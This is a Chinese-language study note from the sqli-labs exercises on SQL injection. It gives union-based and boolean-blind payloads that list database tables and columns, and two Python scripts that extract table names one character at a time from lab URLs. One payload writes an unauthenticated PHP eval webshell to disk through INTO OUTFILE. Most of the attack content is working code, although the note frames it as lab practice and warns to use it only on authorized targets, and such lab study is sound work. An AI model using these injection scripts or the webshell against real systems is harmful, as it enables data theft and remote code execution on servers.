sql注入

关于sql注入

  • SQL 注入的前提

    • 没有对用户输入进行校验/过滤，并且 SQL 语句是字符串拼接而不是预编译（参数化查询）

select group_concat(table_name) from information_schema.tables where table_schema=database()
?id=-1") union  select 1,group_concat(table_name),2 from information_schema.tables where table_schema=database() %23

?id=-1") UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23

?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1) )=','%23
注意：MySQL 的 mid()/substr() 下标从 1 开始，传 0 只会得到空串，永远比较不成功；这是布尔盲注，只能通过页面长度/内容的差异判断真假。
import requests
import time
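LESS5_URL = (
    "https://sql.alienwares.top/Less-5/?id=1' and (select mid((select group_concat(table_name) "
    "from information_schema.tables where table_schema=database()),{pos},1) )='{ch}'%23"
)


def blind_extract(probe, true_len, charset="abcdefghijklmnopqrstuvwxyz0123456789_",
                  max_len=100, pause_every=0, echo=False):
    """Recover a string one character at a time through a boolean-blind oracle.

    ``probe(pos, ch)`` must issue the injected query that tests whether the
    1-based character ``pos`` of the secret equals ``ch`` and return the
    response body length; a length equal to ``true_len`` is read as "true".
    ``true_len`` has to be calibrated per target (the length of the page for
    a known-true condition); a changed template, an error banner or a WAF
    block page silently breaks the oracle.

    Positions are 1-based because MySQL ``MID()``/``SUBSTR()`` return an empty
    string for position 0 -- starting the loop at 0 only burns a full round
    of requests on a position that can never match. ``,`` is tried first
    because the secret is a ``group_concat`` list; ``charset`` must not
    contain quote characters, it is inserted into an SQL string literal as-is.
    Extraction stops at the first position where no candidate matches, which
    normally means end of string (or a character outside ``charset``). With
    MySQL's default case-insensitive collation a lowercase candidate is
    presumably also accepted for an uppercase character -- verify per target.
    Every ``pause_every`` positions the loop sleeps one second to stay under
    rate limits; ``echo`` prints each character as it is recovered.

    Returns the recovered text (possibly empty).
    """
    candidates = "," + charset
    recovered = []
    for pos in range(1, max_len + 1):
        if pause_every and pos % pause_every == 0:
            time.sleep(1)
        for ch in candidates:
            if probe(pos, ch) == true_len:
                recovered.append(ch)
                if echo:
                    print(ch, end="", flush=True)
                break
        else:
            # No candidate matched: end of string, or a char outside charset.
            break
    return "".join(recovered)


def _probe_less5(pos, ch):
    """Send one oracle request to the Less-5 lab target and return the body length."""
    return len(requests.get(LESS5_URL.format(pos=pos, ch=ch)).content)


def main():
    """Dump the current database's table names from the sqli-labs Less-5 target.

    Only run this against a host you are authorised to test; 704 is the
    body length of a "true" page on that specific instance and must be
    re-measured for any other target.
    """
    blind_extract(_probe_less5, true_len=704, pause_every=10, echo=True)
    print()


if __name__ == "__main__":
    main()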
?id=1" and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1) )='e' %23
Python 脚本同上，只需替换 URL（换成对应关卡）以及“正确”响应的页面长度。


@@datadir 读取数据库路径
@@basedir 获取 MySQL 安装路径
http://localhost/sqli-labs-master/Less-7/?id=-1')) union select 1,'2','<?php @eval($_POST["cmd"]);?>' into outfile 'C:/AppServ/www/data.txt' %23
注意：into outfile 要求数据库用户具有 FILE 权限、secure_file_priv（MySQL 5.5+）允许写入目标目录，且该目录对 MySQL 进程可写，否则写入失败且页面通常没有提示；写出的 `<?php @eval($_POST["cmd"]);?>` 是一个无认证的 webshell，只能在自己的靶场里使用。
import requests
import time
#706 正确的长度
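LESS8_URL = (
    "https://sql.alienwares.top/Less-8/?id=1' and (select mid((select group_concat(table_name) "
    "from information_schema.tables where table_schema=database()),{pos},1) )='{ch}'%23"
)


def blind_extract_paced(probe, true_len, charset="abcdefghijklmnopqrstuvwxyz0123456789_",
                        max_len=100, delay=1.0, echo=False):
    """Recover a string through a boolean-blind oracle, pausing after every request.

    ``probe(pos, ch)`` issues the injected query testing whether the 1-based
    character ``pos`` of the secret equals ``ch`` and returns the response
    body length; a length equal to ``true_len`` counts as "true". ``true_len``
    must be calibrated per target (here the comment above records 706 for
    Less-8); a changed template or a WAF page silently breaks the oracle.

    Positions are 1-based because MySQL ``MID()``/``SUBSTR()`` return an empty
    string for position 0, so the original ``range(0, 100)`` wasted a whole
    round of requests on a position that can never match. ``,`` is tried
    first because the secret is a ``group_concat`` list; ``charset`` must not
    contain quote characters, it is inserted into an SQL string literal
    unescaped. Extraction stops at the first position with no matching
    candidate (normally end of string, or a character outside ``charset``).
    ``delay`` seconds are slept after every probe to stay under rate limits;
    ``echo`` prints each character as soon as it is confirmed.

    Returns the recovered text (possibly empty).
    """
    candidates = "," + charset
    recovered = []
    for pos in range(1, max_len + 1):
        for ch in candidates:
            length = probe(pos, ch)
            if delay:
                time.sleep(delay)
            if length == true_len:
                recovered.append(ch)
                if echo:
                    print(ch, end="", flush=True)
                break
        else:
            # No candidate matched: end of string, or a char outside charset.
            break
    return "".join(recovered)


def _probe_less8(pos, ch):
    """Send one oracle request to the Less-8 lab target and return the body length."""
    return len(requests.get(LESS8_URL.format(pos=pos, ch=ch)).content)


def main_less8():
    """Dump the current database's table names from the sqli-labs Less-8 target.

    Only run this against a host you are authorised to test; 706 is the
    body length of a "true" page on that specific instance and must be
    re-measured for any other target.
    """
    blind_extract_paced(_probe_less8, true_len=706, delay=1, echo=True)
    print()


if __name__ == "__main__":
    main_less8()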


